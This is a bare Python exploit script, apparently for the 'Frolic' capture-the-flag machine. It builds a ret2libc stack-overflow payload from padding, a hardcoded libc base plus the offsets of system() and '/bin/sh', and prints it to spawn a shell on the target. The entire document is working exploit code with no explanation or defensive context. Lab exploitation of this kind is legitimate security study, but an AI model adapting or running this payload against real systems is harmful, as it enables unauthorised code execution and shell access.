Frolic rop exploit

rop.py

#!/usr/bin/python
from struct import pack

def little(x):
	return pack('<I', x)

buf_len = 52
libc_addr = 0xb7e19000
system_off = 0x0003ada0

trash_ret = little(0xdeadbeef)
binsh_str_off = 0x15ba0b

def main():
	buf = "A" * buf_len
	buf += little(libc_addr + system_off)
	buf += trash_ret
	buf += little(libc_addr + binsh_str_off)
	print buf
	
if __name__ == "__main__":
	main()